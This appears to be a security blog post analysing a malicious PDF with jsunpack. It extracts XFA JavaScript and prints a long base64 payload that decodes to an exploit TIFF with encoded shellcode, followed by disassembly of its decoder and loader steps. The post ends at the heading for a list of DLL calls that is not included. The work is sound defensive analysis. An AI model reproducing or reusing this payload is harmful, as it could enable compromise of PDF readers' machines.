We here at Visible Risk love open source software. Some of the best applications used by security professionals are open source - Volatility & WireShark to name a few. We also want to contribute back to the community as much as we can. This blog post and the next blog post will focus on analyzing malicious PDF files and the changes we’ve made to jsunpack to facilitate this analysis. The changes we’ve made involve extracting JavaScript from XFA objects (part 1), handling the various types of encryption methods used (part 2), and parsing and analysis of object streams (also part 2). We’ve shared these changes back to the jsunpack project and you can download the latest version with these changes soon(now?).
Adobe Reader has had its share of vulnerabilities over the years. Because of this, PDFs are a popular delivery mechanism for client-side attacks. However, instead of focusing on creating signatures for each individual exploit, it’s usually easier and more effective to focus on the part of the attack that is most common… JavaScript.
PDFs can have JavaScript in them in essentially two ways - defined in JavaScript objects or defined inside of XFA objects. Since we have better things to do than manually extract this information, it’ll be nice if there was a way to programmatically extract it. Thankfully, there’s an open source project for that already does this, the aforementioned jsunpack. As an example, we’ll use a malicious PDF with a SHA256 of 7d033b4aafbae119e9459a06530b4d4c6202fb6b697f4b048a63344c1e0bc30f.
We start by running the main jsunpack script on the PDF.
(23)>python jsunpackn.py ~/malpdf.pdf
(24)>
Well, that was disappointing. I wonder what happened? To investigate, we’ll just run pdf.py on it(24)>
(25)>python pdf.py ~/malpdf.pdf parsing malpdf.pdf
Wrote JavaScript (22817 bytes — 16999 headers / 5818 code) to file malpdf.pdf.out
That’s promising. Let’s take a quick look.Wrote JavaScript (22817 bytes — 16999 headers / 5818 code) to file malpdf.pdf.out
Looks like JavaScript to me! Let’s run it in spidermonkey.
(12)>js malpdf.pdf.out
malpdf.pdf.out:8: SyntaxError: missing ) after condition:
malpdf.pdf.out:8: i=7;y=bib(b,i);s=nob();if(s>=t){v=d;v+=kit(p,x);q=8;v+=bib(lab,q);
malpdf.pdf.out:8: ___________________________^
So close! And that explains why jsunpackn didn’t display anything. Let’s take a closer look at the PDF. We see that in obj 9 0, obj 6 0 is defined as a XFA object.malpdf.pdf.out:8: SyntaxError: missing ) after condition:
malpdf.pdf.out:8: i=7;y=bib(b,i);s=nob();if(s>=t){v=d;v+=kit(p,x);q=8;v+=bib(lab,q);
malpdf.pdf.out:8: ___________________________^
Looking at obj 6 0, we see that it’s compressed.
Specifically, you see that the filter used is called FlateDecode. FlateDecode is the deflate compression method from zlib. There are several different compression types that can be used and they can actually be chained together. Decompressing this stream is no worry because jsunpack already handles compressed streams. After decompressing this stream, we can see the data is XML. Since the data is XML, the simplest way to navigate it is using an XML parser. It also has the benefit of converting the > to a > for us. After making these changes to pdf.py, we extract the JavaScript again and run it.
(52)>js malpdf.pdf.out
malpdf.pdf.out:12: ReferenceError: vKMfFyr1 is not defined
Progress! A different syntax error this time. What in the world is vKMfFyr1? And why would the JavaScript expect that to be defined. Looking back at the XML data, we see that VKMfFyr1 is the name of the field tag that contains the JavaScript. We also see it is the name of a tag in the <xfa:data> section. As it turns out, Adobe Reader will give its JavaScript engine an object with the name from the field tag, vKMfFyrl, and set its rawValue property to the corresponding data in the <xfa:data> tag. In our case, it’s empty, but we do need the property defined. We add those changes in, and we run it again.malpdf.pdf.out:12: ReferenceError: vKMfFyr1 is not defined
(55)>js malpdf.pdf.out
(56)>
No more syntax error! Still no output either though. Let’s take a closer look to at the last part of the extracted JavaScript.(56)>
What does vKMfFyr1[u] = v do? It turns out u is the string “rawValue” and v is a really long string. Since we want to analyze this string, we make pdf.py print out the value of rawValue. And this is what we see:
SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xe5iQMAAIs0JIn3VoA+XnQGrDTcquL6w+jk////glGqyDSG3dzcZanf3NxVGy94IzxRbNTf3Nw0mN3c3EtRQ9zZ3Ny21oGR01hM3Nzcios0t93c3LRc3tzcj4s05N3c3FkcqN43PLS9XQUTNG7e3NwjDODaoMQ0r93c3OHc/NzcodCPNHHc3NxZHKnCN2SPNLjc3NxZHKnO7Ry4V5zEV5zo4Tje3NyoBjdAi1UrtiOF7RwgLnJLg1zk3KjfSjdYi+0ctiOFIC66cxubIufc7dyDtFze3NyPizRn3NzctC4HqHE0W93c3LREs5PhjDRq3dzctty2IiMMiVU5toiF9RC8UaD4/IvtHC92g1GrzLaYU9rtB7RUIm/KNNje3NyLio+Pj4+Pj48jqdQjDFWY+MC9FR7Y3IlVObbghfUQi1Gg+NiNi+0cL3aDU9u2r7Sy3L3ctK7cqdxVu9AjqdRTm8y0JqZJODTY3dzctAEE8iCMNO/d3NyLIwxfGNCDFR7Y3LSIFnNNNETd3Ny2nLTczNzctt223CMMH4lVOTSE3dzctLkzk9mMNCHc3NztFY2NI6nMI6nQI6nUjSMMFR7Q3IlVObQuB6hxNH7c3Ny0opZfC4w0Ddzc3LbctPncj9xR0PgjqdCNI6nUIwwVHtTciVU5XTDU3tzcvO0HtKs31/00ttzc3Eq003vChYo0RNzc3FGRII221LYjIwxNP5a0hrIHB4o0XNzc3FGRJFFhJCEjI4203N7c3Iu2xSOpICMMTT/5tBFQqy2KNIfc3Nwj6yMM02rUlbTuotr8ijSU3NzcjSPrIwxXxFWA+MC9FR+87Ry4V4zsV47QV47IV6707SPtHHCaWRyo0eC9oN7w/B0T0d0bNzfnoPj4V57MV86pB1WY+MC9HtjcvFew+PhXmeBXiNmk3TZXlsRXhvzdNz/olVfoV90y7SPtHCBwWByo2x0T0d0bNyjnoPj0qT1XhvjdN7pX0JdXhsDdN1fYV900VZj4wL0e1Ny0s7Lc3LSprrCxiDTf3NzchYUftFKS0jC0yxb3sjSIIyMjjDRUIyMjIzy0yxb3sjSeIyMjI6j42Iw0riMjIx7Y3LSoqKzm8/Ompq6ysrm9uba0tfK4uLKv8rK9sbnzvuqys6S97fPj7u+5uOu/v+vtv7noueXr7unr6L7s7Om67Onp5Ont7O7s7ezr6bjpuuzv7O3p7+y/7Ovs7unr6e7suem+6b3s6+ft5+/c3NwAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol
Excellent, jsunpack’s pdf parser has done its job.
But what about that string? It looks base64 encoded to me; let’s treat it as such and decode it. And when you decode it, you get a string that begins like this
49492a003820000090909090909090909090909090909090909090909090909090909090909090909090909090909090
That looks like some shellcode to me. Let’s analyze that. At 1534 bytes into the string, there is a sequence of bytes that if they were an x86 instruction, they would be a near call. Shellcode will often use near call instructions to find itself in memory. A near call pushes EIP onto the stack. The shellcode can then read the address from the stack, giving it the location in memory of the instruction after the near call. The shellcode can then use that value to deobfuscate the rest of the shellcode.ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0x40ffe9L | mov ecx,0x389 | 1 | 1 |
0x40ffeeL | mov esi,[esp] | 1 | 2 |
0x40fff1L | mov edi,esi | 1 | 3 |
0x40fff3L | push esi | 1 | 4 |
0x40fff4L | cmp byte [esi],0x5e | 1 | 5 |
0x40fff7L | jz 0x40ffff | 1 | 6 |
0x40fff9L | lodsb | 905 | 3623 |
0x40fffaL | xor al,0xdc | 905 | 3624 |
0x40fffcL | stosb | 905 | 3625 |
0x40fffdL | loop 0x40fff9 | 905 | 3626 |
0x40ffffL | ret | 1 | 3627 |
0x410000 | call 0x40ffe9 | 1 | 0 |
ADDRESS | DISASSEBMLY | COUNT | EXE COUNT |
---|---|---|---|
0x410256L | pusha | 1 | 3635 |
0x410257L | xor eax,eax | 1 | 3636 |
0x410259L | mov edx,fs:[eax+0x30] | 1 | 3637 |
0x41025dL | mov edx,[edx+0xc] | 1 | 3638 |
0x410260L | mov edx,[edx+0x14] | 1 | 3639 |
0x410263L | mov esi,[edx+0x28] | 2 | 3749 |
0x410266L | xor edi,edi | 2 | 3750 |
0x410268L | xor eax,eax | 23 | 3880 |
0x41026aL | lodsb | 23 | 3881 |
0x41026bL | inc esi | 23 | 3882 |
0x41026cL | test eax,eax | 23 | 3883 |
0x41026eL | jz 0x41027d | 23 | 3884 |
0x410270L | cmp al,0x61 | 21 | 3874 |
0x410272L | jl 0x410276 | 21 | 3875 |
0x410274L | sub al,0x20 | 17 | 3876 |
0x410276L | ror edi,0xd | 21 | 3877 |
0x410279L | add edi,eax | 21 | 3878 |
0x41027bL | jmp 0x410268 | 21 | 3879 |
0x41027dL | cmp edi,[esp+0x24] | 2 | 3885 |
0x410281L | mov eax,[edx+0x10] | 2 | 3886 |
0x410284L | mov edx,[edx] | 2 | 3887 |
0x410286L | jnz 0x410263 | 2 | 3888 |
0x410288L | mov [esp+0x1c],eax | 1 | 3889 |
0x41028cL | popa | 1 | 3890 |
0x41028dL | retn 0x4 | 1 | 3891 |
ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0x410172 | push byte 0x40 | 1 | 4700 |
0x410174L | push dword 0x1000 | 1 | 4701 |
0x410179L | push byte 0x1 | 1 | 4702 |
0x41017bL | push byte 0x0 | 1 | 4703 |
0x41017dL | call eax | 1 | 4704 |
kernel32.VirtualAlloc(lpAddress=0x0, dwSize=0x1, flAllocationType=0x1000, flProtect=0x40)
Interestingly, only one byte is requested. However, since lpAddress is set to null, it gets all the space allocated up to the next page boundary. The shellcode relies on this, since it then copies 0x375 bytes into that newly allocated space and then jumps into it. ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0x41000e | mov ecx,0x375 | 1 | 4712 |
0x410013L | mov edi,eax | 1 | 4713 |
0x410015L | rep movsb | 1 | 4714 |
0x410017L | jmp eax | 1 | 4715 |
ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0xf000003f | call eax | 1 | 12078 |
0x410017L | cmp al,0x6 | 1 | 12085 |
The shellcode checks the major version of the OS. Microsoft provides those values here. The short story is the 6 is Windows Vista and later, and 5 is Windows XP and earlier. For Windows Vista and later, the shellcode finds advapi32 and shell32 through the process’ loaded modules, not by using LoadLibraryA. In all, the DLL calls made are:
